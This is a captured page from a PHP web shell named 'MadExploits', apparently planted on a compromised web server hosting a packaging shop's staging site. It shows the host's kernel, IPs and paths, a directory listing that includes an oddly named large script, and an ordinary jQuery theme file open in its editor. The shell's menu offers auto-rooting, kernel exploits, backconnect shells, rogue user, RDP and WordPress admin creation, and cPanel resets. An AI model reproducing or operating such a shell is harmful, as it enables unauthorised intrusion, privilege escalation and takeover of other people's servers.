Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 104.23.253.118
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
staging.cbdpackaginghub.com /
assets /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
bootstrap
[ DIR ]
drwxr-xr-x
feather
[ DIR ]
drwxr-xr-x
slick
[ DIR ]
drwxr-xr-x
apexchart.js
930.13
KB
-rw-r--r--
appear.js
4.13
KB
-rw-r--r--
auto-height.js
1.22
KB
-rw-r--r--
bootstrap.min.js
58.68
KB
-rw-r--r--
bxslider.js
23.68
KB
-rw-r--r--
clipboard.min.js
19.24
KB
-rw-r--r--
copy-clipboard.js
308
B
-rw-r--r--
custom-chart.js
12.9
KB
-rw-r--r--
custom-slick-animated.js
240
B
-rw-r--r--
custom-wow.js
84
B
-rw-r--r--
delivery-option.js
263
B
-rw-r--r--
filter-sidebar.js
432
B
-rw-r--r--
fly-cart.js
1.19
KB
-rw-r--r--
ion.rangeSlider.min.js
81.4
KB
-rw-r--r--
jquery-3.6.0.min.js
147.74
KB
-rw-r--r--
jquery-ui.js
447.08
KB
-rw-r--r--
jquery-ui.min.js
367.67
KB
-rw-r--r--
jquery.countdown.js
4.41
KB
-rw-r--r--
jquery.elevatezoom.js
37.71
KB
-rw-r--r--
jquery.fancybox.js
150.49
KB
-rw-r--r--
jquery.form.min.js
16.69
KB
-rw-r--r--
jquery.js
87.56
KB
-rw-r--r--
jquery.validate.min.js
24.02
KB
-rw-r--r--
lazysizes.min.js
12.9
KB
-rw-r--r--
lusqsztk.js
560.49
KB
-rw-r--r--
main-slider-script.js
2.88
KB
-rw-r--r--
mixitup.js
51
KB
-rw-r--r--
nav-tab.js
238
B
-rw-r--r--
otp.js
1.25
KB
-rw-r--r--
owl.carousel.min.js
42.92
KB
-rw-r--r--
owl.js
83.3
KB
-rw-r--r--
popper.min.js
18.16
KB
-rw-r--r--
quantity-2.js
974
B
-rw-r--r--
quantity.js
396
B
-rw-r--r--
script.js
10.06
KB
-rw-r--r--
select2.min.js
69.23
KB
-rw-r--r--
sticky-cart-bottom.js
363
B
-rw-r--r--
swiper.min.js
135.25
KB
-rw-r--r--
table-column-remove.js
190
B
-rw-r--r--
theme-setting.js
1.51
KB
-rw-r--r--
timer1.js
2.49
KB
-rw-r--r--
timer2.js
2.49
KB
-rw-r--r--
timer3.js
2.49
KB
-rw-r--r--
timer4.js
2.49
KB
-rw-r--r--
wizard.js
841
B
-rw-r--r--
wow.js
6.15
KB
-rw-r--r--
wow.min.js
14.34
KB
-rw-r--r--
zoom-filter.js
880
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : script.js
(function($) { "use strict"; //Hide Loading Box (Preloader) function handlePreloader() { if($('.preloader').length){ $('.preloader').delay(200).fadeOut(500); } } //Update Header Style and Scroll to Top function headerStyle() { if($('.main-header').length){ var windowpos = $(window).scrollTop(); var siteHeader = $('.header-style-one'); var scrollLink = $('.scroll-to-top'); var sticky_header = $('.main-header .sticky-header'); if (windowpos > 100) { sticky_header.addClass("fixed-header animated slideInDown"); scrollLink.fadeIn(300); }else { sticky_header.removeClass("fixed-header animated slideInDown"); scrollLink.fadeOut(300); } if (windowpos > 1) { siteHeader.addClass("fixed-header"); }else { siteHeader.removeClass("fixed-header"); } } } headerStyle(); //Submenu Dropdown Toggle if($('.main-header li.dropdown ul').length){ $('.main-header .navigation li.dropdown').append('<div class="dropdown-btn"><i class="fa fa-angle-down"></i></div>'); } //Mobile Nav Hide Show if($('.mobile-menu').length){ var mobileMenuContent = $('.main-header .main-menu .navigation').html(); $('.mobile-menu .navigation').append(mobileMenuContent); $('.sticky-header .navigation').append(mobileMenuContent); $('.mobile-menu .close-btn').on('click', function() { $('body').removeClass('mobile-menu-visible'); }); //Dropdown Button $('.mobile-menu li.dropdown .dropdown-btn').on('click', function() { $(this).prev('ul').slideToggle(500); $(this).toggleClass('active'); }); //Menu Toggle Btn $('.mobile-nav-toggler').on('click', function() { $('body').addClass('mobile-menu-visible'); }); //Menu Toggle Btn $('.mobile-menu .menu-backdrop, .mobile-menu .close-btn').on('click', function() { $('body').removeClass('mobile-menu-visible'); }); } //Header Search if($('.search-btn').length) { $('.search-btn').on('click', function() { $('.main-header').addClass('moblie-search-active'); }); $('.close-search, .search-back-drop').on('click', function() { $('.main-header').removeClass('moblie-search-active'); }); } //Banner Carousel if ($('.banner-carousel').length) { $('.banner-carousel').owlCarousel({ animateOut: 'fadeOut', animateIn: 'fadeIn', loop:true, margin:0, nav:true, smartSpeed: 500, autoHeight: true, autoplay: true, autoplayTimeout:10000, navText: [ '<span class="fa fa-long-arrow-alt-left"></span>', '<span class="fa fa-long-arrow-alt-right"></span>' ], responsive:{ 0:{ items:1 }, 600:{ items:1 }, 1024:{ items:1 }, } }); } //Services Carousel if ($('.services-carousel').length) { $('.services-carousel').owlCarousel({ loop: true, margin: 30, nav: false, smartSpeed: 500, autoHeight: true, autoplay: true, autoplayTimeout: 10000, navText: ['<span class="fa fa-long-arrow-alt-left"></span>', '<span class="fa fa-long-arrow-alt-right"></span>'], responsive: { 0: { items: 1 }, 600: { items: 2 }, 768: { items: 2 }, 1024: { items: 3 }, 1200: { items: 4 }, } }); } //Products Carousel if ($('.products-carousel').length) { $('.products-carousel').owlCarousel({ loop: true, margin: 30, nav: false, smartSpeed: 400, autoplay: true, navText: ['<span class="flaticon-left"></span>', '<span class="flaticon-right"></span>'], responsive: { 0: { items: 1 }, 600: { items: 2 }, 768: { items: 3 }, 1024: { items: 4 }, } }); } //Clients Carousel if ($('.clients-carousel').length) { $('.clients-carousel').owlCarousel({ loop:true, margin:30, nav:false, smartSpeed: 400, autoplay: true, navText: [ '<span class="flaticon-left"></span>', '<span class="flaticon-right"></span>' ], responsive:{ 0:{ items:1 }, 480:{ items:2 }, 600:{ items:3 }, 768:{ items:4 }, 1023:{ items:5 }, } }); } // Testimonial Carousel if ($('.testimonial-carousel').length) { $('.testimonial-carousel').owlCarousel({ loop: true, margin: 0, nav: false, items: 1, smartSpeed: 700, autoplay: 5000, navText: ['<span class="flaticon-left-chevron"></span>', '<span class="flaticon-right-chevron"></span>'], responsive: { 0: { items: 1 }, 768: { items: 2 }, 1199: { items: 3 }, } }); } // Testinomials Carousel if ($('.testimonial-content').length) { var testimonial_thumbs = new Swiper('.testimonial-thumbs', { spaceBetween: 5, loop: false, slidesPerView: 3, breakpoints: { 320: { slidesPerView: 3, }, 600: { slidesPerView: 3, }, } }); var testimonial_content = new Swiper('.testimonial-content', { spaceBetween: 0, effect: 'fade', loop: true, thumbs: { swiper: testimonial_thumbs }, pagination: { el: '.testimonial-pagination', clickable: true, }, }); } //Fact Counter + Text Count if($('.count-box').length){ $('.count-box').appear(function(){ var $t = $(this), n = $t.find(".count-text").attr("data-stop"), r = parseInt($t.find(".count-text").attr("data-speed"), 10); if (!$t.hasClass("counted")) { $t.addClass("counted"); $({ countNum: $t.find(".count-text").text() }).animate({ countNum: n }, { duration: r, easing: "linear", step: function() { $t.find(".count-text").text(Math.floor(this.countNum)); }, complete: function() { $t.find(".count-text").text(this.countNum); } }); } },{accY: 0}); } //Accordion Box if ($('.accordion-box').length) { $(".accordion-box").on('click', '.acc-btn', function () { var outerBox = $(this).parents('.accordion-box'); var target = $(this).parents('.accordion'); if ($(this).hasClass('active') !== true) { $(outerBox).find('.accordion .acc-btn').removeClass('active '); } if ($(this).next('.acc-content').is(':visible')) { return false; } else { $(this).addClass('active'); $(outerBox).children('.accordion').removeClass('active-block'); $(outerBox).find('.accordion').children('.acc-content').slideUp(300); target.addClass('active-block'); $(this).next('.acc-content').slideDown(300); } }); } //LightBox / Fancybox if($('.lightbox-image').length) { $('.lightbox-image').fancybox({ openEffect : 'fade', closeEffect : 'fade', helpers : { media : {} } }); } // Scroll to a Specific Div if($('.scroll-to-target').length){ $(".scroll-to-target").on('click', function() { var target = $(this).attr('data-target'); // animate $('html, body').animate({ scrollTop: $(target).offset().top }, 300); }); } // Elements Animation if($('.wow').length){ var wow = new WOW( { boxClass: 'wow', // animated element css class (default is wow) animateClass: 'animated', // animation css class (default is animated) offset: 0, // distance to the element when triggering the animation (default is 0) mobile: false, // trigger animations on mobile devices (default is true) live: true // act on asynchronously loaded content (default is true) } ); wow.init(); } // count Bar if ($(".count-bar").length) { $(".count-bar").appear( function () { var el = $(this); var percent = el.data("percent"); $(el).css("width", percent).addClass("counted"); }, { accY: -50 } ); } $(".quantity-box .add").on("click", function () { if ($(this).prev().val() < 999) { $(this) .prev() .val(+$(this).prev().val() + 1); } }); $(".quantity-box .sub").on("click", function () { if ($(this).next().val() > 1) { if ($(this).next().val() > 1) $(this) .next() .val(+$(this).next().val() - 1); } }); if ($('.product-details .bxslider').length) { $('.product-details .bxslider').bxSlider({ nextSelector: '.product-details #slider-next', prevSelector: '.product-details #slider-prev', nextText: '<i class="fa fa-angle-right"></i>', prevText: '<i class="fa fa-angle-left"></i>', mode: 'fade', auto: 'true', speed: '700', pagerCustom: '.product-details .slider-pager .thumb-box' }); }; //Tabs Box if($('.tabs-box').length){ $('.tabs-box .tab-buttons .tab-btn').on('click', function(e) { e.preventDefault(); var target = $($(this).attr('data-tab')); if ($(target).is(':visible')){ return false; }else{ target.parents('.tabs-box').find('.tab-buttons').find('.tab-btn').removeClass('active-btn'); $(this).addClass('active-btn'); target.parents('.tabs-box').find('.tabs-content').find('.tab').fadeOut(0); target.parents('.tabs-box').find('.tabs-content').find('.tab').removeClass('active-tab'); $(target).fadeIn(300); $(target).addClass('active-tab'); } }); } //Price Range Slider if($('.price-range-slider').length){ $( ".price-range-slider" ).slider({ range: true, min: 10, max: 99, values: [ 10, 60 ], slide: function( event, ui ) { $( "input.property-amount" ).val( ui.values[ 0 ] + " - " + ui.values[ 1 ] ); } }); $( "input.property-amount" ).val( $( ".price-range-slider" ).slider( "values", 0 ) + " - $" + $( ".price-range-slider" ).slider( "values", 1 ) ); } // Select2 Dropdown $('.custom-select').select2({ minimumResultsForSearch: 7, }); //Gallery Filters if($('.filter-list').length){ $('.filter-list').mixItUp({}); } /* ========================================================================== When document is Scrollig, do ========================================================================== */ $(window).on('scroll', function() { headerStyle(); }); /* ========================================================================== When document is loading, do ========================================================================== */ $(window).on('load', function() { handlePreloader(); }); })(window.jQuery);
Close